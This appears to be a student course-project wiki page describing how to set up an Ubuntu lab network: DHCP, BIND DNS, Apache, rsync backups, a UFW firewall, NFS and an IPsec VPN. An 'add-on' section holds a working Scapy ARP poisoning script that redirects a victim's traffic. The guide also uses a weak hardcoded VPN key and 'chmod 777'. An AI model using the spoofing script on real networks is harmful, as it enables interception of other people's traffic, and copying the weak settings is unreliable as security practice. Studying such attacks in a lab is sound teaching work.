Data Networking/Fall 2016/PAKP

Group Members edit

Ashwin Maniyankode Chandranathan
Kailash Natarajan
Pooja Deshpande
Pranoy Thykkoottathil Jose

Objective edit

The main objective of this project is to build a secure and a dynamic network which has Dynamic Host Configuration Protocol(DHCP),Domain Name Server(DNS), Webserver, Firewall and Backup system using the Linux-Ubuntu operating system.


Behaviour of the Protocols edit

Dynamic Host Configuration Protocol edit

Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of IP addresses (i.e., a scope) configured for a given network.The DHCP server leases an address to any DHCP-enabled client when it starts up on the network. Since IP addresses are dynamic (leased) rather than static (permanently assigned), addresses which are no longer in use are automatically returned to the pool for reallocation. Both IPV4 and IPV6 addresses can be assigned using DHCP server.

DHCP supports three mechanisms for IP address allocation.

  1. Automatic allocation: DHCP assigns IP address to a client when it gets the requests from them.
  2. Dynamic allocation: DHCP assigns IP addresses to clients for a specified period of time (or until the client explicitly relinquishes the address). When the lease expires, then the client will have to request for an extension on the lease or request another IP.
  3. Manual allocation: Using DHCP, we can assign the same IP to a particular device by using its MAC address as an identifier. For example, a server will always have the same IP, even though it is getting it via. the DHCP server.

One or more of these mechanisms will get used depending on the policies of the network administrator.

Domain Name System edit

DNS is an application layer protocol with the ability to translate domain names to IP addresses and vice versa. The basic job of the DNS is to provide simplicity for the application user; i.e. it provides an easier way that will translate the user-friendly domain name to a machine understanding IP address which is then used to fetch and forward data. With the explosion in the use of internet and World Wide Web in commercial, security, social markets among many others, it is not possible for a user to remember the logical IP addresses of the sites. This is where DNS steps in and makes it possible such that the user just needs to remember the user-friendly domain name like www.google.com from which the DNS will translate it into an IP address as 8.8.8.8.

Jumping further into the behavior of the protocol, the DNS stores DNS records for a domain name with corresponding IP addresses and it will respond to queries from the user with answers from its database.

DNS Records are nothing but the database files from which the mappings are fetched. Some of the commonly used DNS records are A, CNAME, MX, PTR, NS.

RECORD TYPE EXAMPLE NAME MAPPED DATA DESCRIPTION
NS test.com dns1.test.com This record indicates the host/user about the authoritative servers and also provides with information about the Master and Slave servers of the zone.
A dns1.test.com 192.168.1.1 This is the most basic type of DNS Record which indicates the 32 bit IPv4 address of the domain, i.e. mapping the FQDN to an IP address.
CNAME test.com a.test.com This record maps to the canonical name (CNAME) details for the alias that is mentioned in the FQDN.
MX test.com mail.test.com EThis record is used for the mapping of mail exchange server information to a specific domain name.
PTR 192.168.1.1 dns1.test.com This is an interesting record type where the user actually has the IP address of the domain from which he can map it to a CNAME, these mappings are stored in this record type.


Webserver & Firewall edit

A webserver should run on the Linux OS to host a website. Apache2 is the used webserver.A firewall is used to provide a layer of security to control the incoming and outgoing traffic in a network and to block and filter packets to go into the system. The firewall can for a system or even a specific server with bunches of databases or confidential data which is being shielded from unapproved clients in/outside the system.

Signalling edit

Dynamic Host Configuration Protocol edit

1. When a Client, configured with the TCP/IP setting “Obtain an IP address automatically(DHCP)”, plugs into a network, it sends out a broadcast from UDP port 68 to UDP port 67 to “DISCOVER” a DHCP Server (or relay agent).
2.The DHCP Server then responds by sending out an “Offer” (through a relay agent if applicable).
3.Then the client sends out a “Request”, requesting an IP address .
4. This request is finally “Acknowledged” by the server so that the client starts using the IP address.

Domain Name Server edit

1. The requesting host will generate a DNS query packet, which will be passed to the Local DNS Server that is connected to the host network.
2. The Local DNS Server will receive this query and forward this to appropriate Root Name Server. The Root Name Server will check if it is a valid domain and if there are entries for that in its database and reply to the Local DNS.
3. The Local DNS will then send a query to the TLD DNS Server which will send the details of the Authoritative Name Server which will have the details of the mapping address or name.
4. The Local DNS Server will then send a query to the Authoritative Name server seeking the mapping for the domain name or the IP address which was initially sent by the requesting host.

Webserver edit

1.The client initiates a TCP connection with the web server IP provider.
2.The connection involves a 3 way handshake mechanism.
3.First, the clients sends a SYN message requesting TCP connection to the browser at port 80.
4.The server responds with a SYN-ACK message acknowledging the request and requests the client to open a port for the server to send information.
5.The client responds with the ACK message and also sends a request for the HTML page.

Installation Steps edit

DHCP edit

Step 1: Install DHCP server package

             sudo apt-get install isc-dhcp-server

Step 2: Edit the isc-dhcp-server file

            sudo vim /etc/default/isc-dhcp-server
            On line 11 change:
INTERFACES=”ens33”
Save and Exit

Step 3: Configure the DHCP server for ipv4

            Editing file /etc/dhcp/dhcpd.conf
            sudo vim /etc/dhcp/dhcpd.conf
subnet 192.168.10.0 netmask 255.255.255.0 { range 192.168.10.30 192.168.10.99; option domain-name-servers 192.168.10.10; option subnet-mask 255.255.255.0; option routers 192.168.10.10; option broadcast-address 192.168.10.255; default-lease-time 600; max-lease-time 7200; } iface eth0 inet6 static address 2001:0db8:edfa:1234::1 netmask 64 gateway 2001:0db8:edfa:1234::2

For the servers within the network to always have the same IP, we have matched their MAC addresses with a specific IP.

            host dns-server {
            hardware ethernet 00:0c:29:8e:69:00;
            fixed-address 192.168.10.10;
            }
            host web-server {
            hardware ethernet 00:0c:29:5c:7d:2e;
            fixed-address 192.168.10.20;
            }
            host nfs-server {
            hardware ethernet 00:0c:29:8f:8b:d9;
            fixed-address 192.168.10.15;
            }

Step 4 : Set the static IP address of the DHCP server

            sudo vim /etc/network/interfaces
            auto lo
            iface lo inet loopback
            auto ens33
            iface ens33 inet static
            address 192.168.10.18
            netmask 255.255.255.0
            gateway 192.168.10.1
            broadcast 192.168.10.255
            dns-domain-nameserver 192.168.10.10
          

Step 5: Edit the resolv.conf file

            sudo vim /etc/resolv.conf
            nameserver 192.168.10.10

Step 6: Restart the DHCP server

            sudo /etc/init.d/isc-dhcp-server restart

Step 7: Configuring the DHCPv6 server

Create a file named dhcpd6.conf

            sudo vim /etc/dhcp/dhcpd6.conf
            #/etc/dhcp/dhcpd6.conf
            default-lease-time 86400;
            preferred-lifetime 80000;
            allow leasequery;
            subnet6 2001:0db8:edfa:1234::/64 {
            # Range for clients
            range6 2001:0db8:edfa:1234:5678::aaaa 2001:0db8:edfa:1234:5678::ffff;
            }

DNS Server edit

In this project all the servers are in a private network and the servers receive its IP from the DHCP server. For configuring DNS, we have used Bind9 (Berkeley Internet Name Domain v9) on Ubuntu for resolving hostnames and IP addresses by the clients.

Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command:

             sudo apt-get update 
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command:

             cd /etc/network 
sudo nano interfaces
auto eth0
iface eth0 inet static
address 192.168.10.10
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command:

             cd /etc 
sudo nano hosts
127.0.0.1 localhost
192.168.10.10 ubuntu.project.com Ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:

             cd /etc 
sudo nano hostname
ubuntu.project.com

Step 4: Provide the IP address for the Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command:

             cd /etc/resolvconf/resolv.conf.d 
sudo nano head
nameserver 192.168.10.10
search project.com

Step 5: For the DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file.

Command:

             #Forward Zone 
zone "project.com" {
type master; #specifying if the DNS server is master or slave
file "/etc/bind/db.project.com"; #zone file path
allow-transfer { 192.168.10.11; }; # secondary DNS IP
also-notify { 192.168.10.11; }; };
             #Reverse Zone 
zone "10.168.192.in-addr.arpa" {
type master; #specifying if the DNS server is master or slave
file "/etc/bind/db.192"; #zone file path
allow-transfer { 192.168.10.11; }; # secondary DNS IP
also-notify { 192.168.10.11; }; };

Step 6: Now to add the forwarder IP for the DNS we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the DNS server which can also be added here.

Command:

             options { 
forwarders {
192.168.10.1; #forwarder IP for DNS
};

Step 7: Now we have to create the forward and reverse zone which will act as the database from which the DNS server will look-up to resolve for the Domain name or IP address. This database file can be created with reference to the already existing local database file at – “/etc/bind/db.local” file and making our own copy as the – “/etc/bind/db.project.com” file for the forward zone and “/etc/bind/db.192” file for the reverse zone.

Command:

             Forward Zone Database: 
cd /etc/bind
sudo cp db.local db.project.com
sudo cp db.local db.192
sudo nano /etc/bind/db.project.com
 ;
 ; BIND data file for local loopback interface
 ;
$TTL 604800
@ IN SOA ubuntu.project.com. root.project.com. (
9  ; Serial
604800  ; Refresh
86400  ; Retry
2419200  ; Expire
604800 )  ; Negative Cache TTL
 ;
@ IN NS ubuntu.project.com.
@ IN A 192.168.10.30
ubuntu IN A 192.168.10.30
web IN A 192.168.10.20
www IN CNAME web.project.com.
@ IN AAAA 2001:db8:edfa:1234::15
ubuntu IN AAAA 2001:db8:edfa:1234::15
 ;

Note:
• The serial number 9 represents the number of times this database file has been edited and make sure you increment it each time the file is edited.
• The @ symbol means that the record applies in all cases not otherwise specified.
• That is followed by IN the record type A or CNAME or AAAA or NS

             Reverse Zone Database: 
sudo nano /etc/bind/db.192
 ;
 ; BIND reverse data file for local loopback interface
 ;
$TTL 604800
@ IN SOA ubuntu.project.com. root.project.com. (
6  ; Serial
604800  ; Refresh
86400  ; Retry
2419200  ; Expire
604800 )  ; Negative Cache TTL
 ;
@ IN NS ubuntu.project.com.
30 IN PTR ubuntu.project.com.
20 IN PTR web.project.com.
20 IN PTR www.web.project.com.
5.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.4.3.2.1.a.f.d.e.8.b.d.0.1.0.0.2.ip6.arpa. IN PTR ubuntu.project.com.
 ;

Note:
• The serial number 6 represents the number of times this database file has been edited and make sure you increment it each time the file is edited.
• The @ symbol means that the record applies in all cases not otherwise specified.
• That is followed by IN the record type PTR or NS

Step 8: Now that we have defined the database and the name servers for the DNS server, we have to restart the server for the configurations to take effect.

Command:

            sudo bind9 restart 
sudo init 6

Configuring Secondary DNS
The primary DNS will provide with the domain name resolving functionality for the clients. If there is a failure in the primary DNS, then the client will not be able to resolve for the domain name and will be cut off from using the web. In order to overcome this, it is advisable to have a secondary DNS server which will act as a backup in case the primary DSN fails. It is relatively easier to configure the secondary DNS once the primary DNS is configured.

Prerequisite:
To configure DNS server one must have root user permissions and install Bind9. To install Bind9, use the following command,

Command:

            sudo apt-get update 
sudo apt-get install bind9 bind9utils bind9-doc
sudo systemctl daemon-reload
sudo systemctl restart bind9

Step 1: Obtain static IP from DHCP server and assign that in the interface – “/etc/network/interfaces”

Command:

           cd /etc/network 
sudo nano interfaces
auto eth0
iface eth0 inet static
address 192.168.10.11
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255
gateway 192.168.10.1

Step 2: Now add the Name Server and Hostname details with respect to the webpage for which address resolving has to be done in the – “/etc/hosts” file.

Command:

           cd /etc 
sudo nano hosts
127.0.0.1 localhost
192.168.10.11 ubuntu.project.com ubuntu

Step 3: Provide the hostname for the webpage to be resolved in the – “/etc/hostname” file.

Command:

           cd /etc 
sudo nano hostname
ubuntu.project.com

Step 4: Provide the IP address for the Secondary Name Server and name of the webpage in the – “/etc/resolvconf/resolv.conf.d/head” file.

Command:

           cd /etc/resolvconf/resolv.conf.d 
sudo nano head
nameserver 192.168.10.11
search project.com

Step 5: For the Secondary DNS Server we have to specify the forward and the reverse zones that will provide with the forward and reverse DN resolving. This can be done from the – “/etc/bind/named.conf.local” file

Command:

#Forward Zone 
zone "project.com" {
type slave; #specifying if the DNS server is master or slave
file "/etc/bind/db.project.com"; #zone file path
masters { 192.168.10.10; }; # primary DNS IP
};
#Reverse Zone
zone "10.168.192.in-addr.arpa" {
type slave; #specifying if the DNS server is master or slave
file "/etc/bind/db.192"; #zone file path
masters { 192.168.10.10; }; # primary DNS IP
};

Step 6: Now to add the forwarder IP for the secondary DNS, we can configure that in the – “/etc/bind/named.conf.options” file. There is also one more option where you can use Access Lists to only allow specified IP addresses to access the secondary DNS server which can also be added here.

Command:

         options { 
forwarders {
192.168.10.1; #forwarder IP for DNS
};

Step 7: Now that we have defined the database and the name servers for the secondary DNS server, we have to restart the server for the configurations to take effect.

Command:

         sudo bind9 restart 
sudo init 6

Webserver edit

Step 1: To Install Apache2 Webserver
Command:

           sudo apt-get install apache2 

Step 2: To Check whether the web server is able to listen on port 80
Command:

           netstat -a | more 

Step 3: To restart the web server
Command:

           sudo /etc/init.d/apache2 restart

Step 4: To develop a webpage for the server
Command:

           cd /var/www/html
sudo nano index.html

Webserver Backup edit

The protocols used for backup are rsync and ssh. Rsync is a protocol used to synchronize files in Ubuntu. It updates only that data that is not yet synchronized with the backup file. Ssh protocol provides a secure channel to send and receive files on Unix machines.It uses encryption and decryption at the end users. Crontab is used for scheduling backups.
Step 1: Install rsync

              sudo apt-get install rsync 

Step 2: Install ssh

              sudo apt-get install openssh-server 

Step 3: Create a public and a private key for security

              ssh-keygen -t rsa 

Step 4: Append new public key

              cat .ssh/id_rsa.pub | ssh ashwinmc1@192.168.10.15 'cat >> .ssh/authorized_keys'

Step 5: Edit crontab

              crontab –e

Step 6: Scheduling and run the rsync command from the crontab to automate the backup of the webserver

              25**** rsync -avzP --delete -e ssh /var/www/html ashwinmc1@192.168.10.15:/home/ashwinmc1/Backup

Firewall edit

Step 1: Install UFW package

           sudo apt-get install ufw

Step 2: Check UFW status

           sudo ufw status

Step 3: Set Up Default Policies

           sudo ufw default deny incoming
           sudo ufw default allow outgoing

Step 4: Allow SSH,http,ftp,https Connections

           sudo ufw allow from 192.168.10.0/24 to any port 443
           sudo ufw allow from 192.168.10.0/24 to any port 80
           sudo ufw allow from 192.168.10.0/24 to any port 21
           sudo ufw allow from 192.168.10.0/24 to any port 22

Step 5: Disabling ping

           sudo nano /etc/ufw/before.rules 

Comment out this line:
-A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT

Step 6: Enable UFW

           sudo ufw enable


Algorithm edit

1. A client tries to connect to the network.
2. Once the client gets connected, he'll try to obtain an IP via DHCP. So a broadcast message will be sent out requesting an IP.
3. The DHCP server will provide an IP address to the client if the request is successful.
Otherwise, 'request fail' message will be obtained and we will need to contact the network administrator for help.
4. The client will now try to access the web server.
If the domain name server details obtained via DHCP is correct, a request will be sent to DNS to resolve the IP address of the domain.
DNS will then reply with IP address of the web page.
else if DNS reply fails, an error message will be displayed saying, ‘server not found.’
else if URL entered is wrong, an error message will be displayed saying, ‘webpage unavailable.’
Retry
5. Client accessed the web server. Now he sends HTTP request to the server.
if the request is successful, the Web page will be displayed
else Error message like ‘no data received’ will be displayed.
Retry

Flow Chart edit

Flow chart has been provided in the project report.

Add-ons Implemented (Additional Features) edit

ARP Poisoning edit

ARP poisoning has been implemented using Scapy.


         # Import scapy
         from scapy.all import *
         # Setting variables
         attIP="192.168.10.39"
         attMAC="00:0c:29:7b:64:65"
         vicIP="192.168.10.40"
         vicMAC="00:0c:29:60:af:21"
         dgwIP="192.168.10.20"
         dgwMAC="00:0c:29:5c:7d:2e"
         # Forge the ARP packet for the victim
         arpFakeVic = ARP()
         arpFakeVic.op=2
         arpFakeVic.psrc=dgwIP
         arpFakeVic.pdst=vicIP
         arpFakeVic.hwdst=vicMAC
         # Forge the ARP packet for the default GW
         arpFakeDGW = ARP()
         arpFakeDGW.op=2
         arpFakeDGW.psrc=vicIP
         arpFakeDGW.pdst=dgwIP
         arpFakeDGW.hwdst=dgwMAC
         # While loop to send ARP
         # when the cache is not spoofed
         while True:
         # Send the ARP replies
         send(arpFakeVic)
         send(arpFakeDGW)
         print "ARP sent"
         # Wait for a ARP replies from the default GW
         sniff(filter="arp and host 10.0.0.1 or host 10.0.0.209", count=1)

NFS edit

Step 1:Configuring the NFS-server
Command:

              sudo apt-get install nfs-kernel-server 
sudo chmod 777 location

Edit the file

              sudo nano /etc/exports

On the last line append below

              /home/ashwinmc1/mnt 192.168.10.0/255.255.255.0(rw,sync,root_squash,subtree_check)

Save and Exit
Change the directory

              cd /home/ashwinmc1/mnt
touch newfile
sudo nano newfile

Start the server

              sudo service nfs-kernel-server start

Step 2:Configuring the NFS-client
Command to Install NFS client:

              sudo apt-get install nfs-common

Make directory in a location

              sudo mount server ip(192.168.10.15):serverpath(/home/ashwinmc1/mnt) client path(/home/mnt)
sudo reboot
sudo mount -a

IPSEC VPN edit

IPSEC VPN has been implemented using the 'strongswan' package. IPSEC VPN helps make the connection between two servers more secure and it also makes sure that sniffing cannot be done between them.

VPN First Server Configuration edit

Step 1:Installing the 'strongswan' package
Command:

               apt-get install ipsec-tools strongswan-starter 

Step 2:Making the cryto map entries
Edit the /etc/ipsec.conf file
Command:

               vim /etc/ipsec.conf
               conn red-to-blue
               authby=secret
               auto=route
               keyexchange=ike
               left=192.168.10.100
               right=192.168.10.200
               type=tunnel
               esp=aes128gcm16!

Step 3:Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command:

               vim /etc/ipsec.secrets
               192.168.10.100 192.168.10.200 : PSK "project"

Step 4:Restart the ipsec service
Command:

               ipsec restart

VPN Second Server Configuration edit

Step 1:Installing the 'strongswan' package
Command:

               apt-get install ipsec-tools strongswan-starter 

Step 2:Making the cryto map entries
Edit the /etc/ipsec.conf file
Command:

               vim /etc/ipsec.conf
               conn blue-to-red
               authby=secret
               auto=route
               keyexchange=ike
               left=192.168.10.200
               right=192.168.10.100
               type=tunnel
               esp=aes128gcm16!

Step 3:Make the PSK entries

We need to edit the /etc/ipsec.secrets file

Command:

               vim /etc/ipsec.secrets
               192.168.10.100 192.168.10.200 : PSK "project"

Step 4:Restart the ipsec service
Command:

               ipsec restart

Testing edit

DHCP Test edit

If the clients are able to get the IP addresses from the defined range of IP addresses defined in the server pool then the DHCP is working properly.
For example, since the DHCPv4 address pool is assigned from 192.168.10.30 to 192.168.10.99 and the DHCPv6 pool is assigned from 2001:0db8:edfa:1234:5678::aaaa to 2001:0db8:edfa:1234:5678::ffff, if a client gets assigned an IP address of 192.168.10.36 & 2001:0db8:edfa:1234:5678::aaa1 through DHCP, then the DHCP server is assigning IP addresses correctly and is functioning properly.

We can also see the status of the DHCP servers by using the commands:

               systemctl status isc-dhcp-server
               systemctl status isc-dhcp-server6

DNS Test edit

For testing the functioning and effectiveness of DNS, the following commands will be useful:
1) Dig
The Domain Information Groper is used to query DNS name servers. It performs DNS lookups and returns the response from the name servers. Eg., We can perform a DIG from the secondary DNS using the following command,
Dig 192.168.10.10 project.com AXFR
This will return with the records from the master server.
2) Ping
Ping is used for checking the network layer status of the server. This can be performed on both the master and the slave DNS to check out if they are reachable from both.
3) Nslookup
nslookup is a command used to query DNS servers. Interactive mode gives permission to the user to query the name servers for getting information about hosts and domains. Non-interactive mode gives permission to the user for printing just the name and the information that is requested for a particular host or domain.
4) Host
Host is used for DNS lookups. It resolves hostnames to IP addresses and vice versa.

Webserver Test edit

Open the web browser and enter the host name or the local IP address. If it is working, then the web server is up and running.

Firewall Test edit

A client can try to ping the servers that are blocked. If the response is 'request timed-out' then, the firewall has blocked the client and it is working as per the firewall rules.

VPN Test edit

To test IPSEC VPN, run a continuous ping from one server to the other. Simultaneously, run the command:

              watch ipsec statusall

or

              tcpdump esp

if the number of packets increases in the first case, or if you see packets come in the second case, then the IPSEC tunnel is configured properly.

ARP Poisoning Test edit

When the client tries to access the webpage, if he/she is redirected to the hacked page, then APR poisoning has been properly implemented.

Future Scope edit

1. Implementing AAA servers for added security.
2. Additional Firewall rules for added security.
3. Adding Mail servers.
4. Expanding server capabilities.
5. Increase the number of DNS for load distribution and decentralization.

References edit

1. https://help.ubuntu.com/community/isc-dhcp-server
2. https://www.gypthecat.com/ipsec-vpn-host-to-host-on-ubuntu-14-04-with-strongswan
3. https://www.digitalocean.com
4. Computer Networking - A top down approach by Kurose and Ross
5. https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-with-ufw-on-ubuntu-14-04
6. https://kb.iu.edu/d/adov
7. https://blogs.technet.microsoft.com/networking/2009/01/29/dhcp-client-behavior